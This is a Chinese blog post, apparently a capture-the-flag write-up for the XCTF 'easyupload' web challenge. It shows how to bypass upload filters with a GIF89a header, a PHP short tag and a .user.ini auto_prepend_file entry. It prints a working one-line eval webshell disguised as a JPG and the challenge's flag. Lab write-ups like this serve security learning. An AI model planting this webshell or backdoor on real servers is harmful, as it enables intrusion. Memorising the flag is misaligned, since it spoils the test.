攻防世界WEB练习-easyupload

已于 2022-09-14 17:33:25 修改
阅读量9.1k 收藏 32
点赞数 30
分类专栏: # 攻防世界 网络安全 文章标签: 服务器 运维 安全 网络 php
于 2022-09-01 06:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63127854/article/details/126633686
版权

前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.csdn.net/m0_63127854?type=blog

攻防世界专栏:https://blog.csdn.net/m0_63127854/category_11983747.html

Upload-labs专栏:https://blog.csdn.net/m0_63127854/category_11850783.html

网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

目录

题目场景

查看源码

官方WriteUp

BP抓包

F12查看文件去向

蚁剑连接

找到flag

题目场景

查看源码

毫无有效的数据

官方WriteUp

本题需要利用文件上传漏洞点,通过绕过服务器的安全防护,达到getshell的目的

本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行

这里需要绕过的点如下

检查文件内容是否有php字符串

检查后缀中是否有htaccess或ph

检查文件头部信息

文件MIME类型

对于第一点可以利用短标签绕过,例如<?=phpinfo();?>

对于第二点可以通过上传.user.ini以及正常jpg文件来进行getshell,可以参考以下文章

https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html

在服务器中,只要是运用了fastcgi的服务器就能够利用该方式getshell,不论是apache或者ngnix或是其他服务器。
这个文件是php.ini的补充文件,当网页访问的时候就会自动查看当前目录下是否有.user.ini,然后将其补充进php.ini,并作为cgi的启动项。
其中很多功能设置了只能php.ini配置,但是还是有一些危险的功能可以被我们控制,比如auto_prepend_file。

第三点绕过方式即在文件头部添加一个图片的文件头,比如GIF89a

第四点绕过方法即修改上传时的Content-Type

因此最终的payload为:
上传.user.ini,内容为

GIF89a                  
auto_prepend_file=a.jpg

上传a.jpg,内容为

GIF89a
<?=eval($_POST['cmd']);?>

BP抓包

上传.user.ini

再上传a.jpg

F12查看文件去向

蚁剑连接

打开flag查看

找到flag

cyberpeace{85f32dea0ed6b7be27fa02c28a97228f}

不知名白帽
关注
  • 30
    点赞
  • 32
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 17
    评论
专栏目录
H5文件上传插件easyUpload.js
06-01
一款流畅的H5文件上传插件,覆盖几乎所有的使用场景,支持上传前预览,多(单)文件上传自定义,支持实时进度条等,你可以按照你想要的方式自定义
XCTF攻防世界web.doc
09-19
0x01 view-source 【题目描述】 X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 【目标】 学会查看源代码 【工具】 firefox浏览器 【分析过程】 可以通过view-source:的方法来访问源码:html view-source:http://10.10.10.175:32796 在url中提交后便可访问页面源码,在源码中可找到flag。
攻防世界】CTF 网络安全学习 easyupload_攻防世界easyupload
最新发布
2401_83620865的博客
04-12 329
做这个题目前前后后一共花了五天的时间,因为本身不是一直有空,这道题首先要预先处理的问题很多。1. 先安装好中国蚁剑,教程整理如下,kali 零基础安装中国蚁剑2. 理解 **.user.ini**文件.user.ini 文件通常是与 PHP 配置相关的文件。在 PHP 应用程序中,用户可以通过 .user.ini 文件来自定义一些 PHP 的配置选项,以适应特定的应用需求。以下是一些关键点:位置: .user.ini 文件通常位于用户的网站目录下,可以影响到该目录及其子目录下的 PHP 执行环境。
攻防世界——web新手和引导模式(全解)
热门推荐
小白一枚多多关注的博客
12-20 2万+
全新攻防世界web新手题目,小白重新归来
easyupload插件动态传参
qq_35488877的博客
12-14 2654
首先感谢funnyque 大佬写出了这么好用的插件,解决了我多文件上传的问题。 但是这个插件 我发现只能通过 formparam 静态传参。 我这里有个业务场景:          获取datagrid的选中行的主键id,将文件上传后, 通过选择的主键id 保存文件名称和文件路径到数据库。 如何获取到动态传参呢? 我在百度上翻阅无果之后,只有硬着头皮翻源码了。 在292行 发现了form...
攻防世界-----web知识点总结
m0_62879498的博客
12-03 1368
WEB 一. 网页源代码的方式 在地址栏前面加上view-source,如view-source:https://www.baidu.com 浏览器的设置菜单框中使用开发者工具,也可以查看网页源代码。 二. robots(robtos.txt) robots是网站跟爬虫间的协议,用简单直接的txt格式文本方式告诉对应的爬虫被允许的权限,也就是说robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。当一个搜索蜘蛛访问一个站点时,它会首先检查该站点根目录下是否存在robots.txt,如
easyupload(攻防世界)
m0_56107268的博客
11-15 7444
.user.ini 学习
easyupload及BurpSuite抓包、改包、放包
Welcome To Myon'Blog !
12-28 3910
easyupload 文件上传题 用BurpSuite进行简单的抓包、改包、放包 一句话木马 绕过 getshell
攻防世界—easyupload
小缪的博客
06-10 3127
知识点:文件上传漏洞。
Web安全攻防世界06 easyupload
weixin_42789937的博客
12-17 3214
Web安全攻防世界06 easyupload,简短地介绍php短标签、图片马的头部类型,以及.user.ini配置文件~
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界Training-Stegano-1
10-31
攻防世界Training-Stegano-1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127614642
攻防世界misc2-1杂项
11-20
攻防世界misc2-1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947409
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127615829
攻防世界Let-god-knows杂项
11-20
攻防世界Let_god_knows杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947532
攻防世界-easyupload
m0_62094846的博客
10-10 2714
上传php文件不行, 修改Content-Type: image/jpeg也不行,把文件名改成jpg才可以,还有头文件也有验证,也要改(这里直接上传正常的jpg文件比较好)然后可以上传成功,但是试过文件名的各种绕过形式,都不能把php上传,就算上传了也不能在蚁剑上读取。这个系统是windows,用user.ini试试(user.ini:把文件当作php文件解析)(index.php是uploads下的php文件,用它读取5.jpg下的文件)然后输入木马,这里尝试过后php也是被过滤的,用缩减版。
easyUpload.js插件文件上传
最美dě陪伴的博客
08-28 3220
@RequestMapping(value = “/chse/file/upload”, method = RequestMethod.POST) @ResponseBody public JSONObject uploadFilesFromHtml(@RequestParam(“file”) MultipartFile[] files, HttpServletRequest ...
【CTF | 网络安全】攻防世界 easyupload 解题详析
等风来
07-31 6657
抓包改后缀,.php1~.php9、.htaccess均被过滤(.htaccess 文件是一个用于配置 Apache Web 服务器的配置文件。它通常位于网站根目录或特定目录中,用来为该目录及其子目录提供特定的配置指令):提示:只要是运用了fastcgi的服务器都能够利用该方式getshell,不论是apache或者ngnix或是其他服务器。我是秋说,我们下次见。
攻防世界---Web---新手模式---backup
11-11
题目描述:在攻防世界Web新手模式中,有一道名为backup的题目。该题目要求找到备份文件并获取flag。可以通过访问http://your-ip/backup/来查看备份文件,但是需要密码才能访问。我们可以通过查看网页源代码或者使用Burp Suite等工具来获取到密码。获取到密码后,我们可以访问备份文件,查看其中的内容,找到flag。 以下是获取密码和查看备份文件的Python代码: ```python import requests # 访问网页获取密码 url = 'http://your-ip/backup/' response = requests.get(url) password = response.text.split('password is ')[1].split('<')[0] # 访问备份文件获取flag url = 'http://your-ip/backup/flag.php' response = requests.get(url, auth=('admin', password)) flag = response.text print(flag) ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 17
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不知名白帽

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值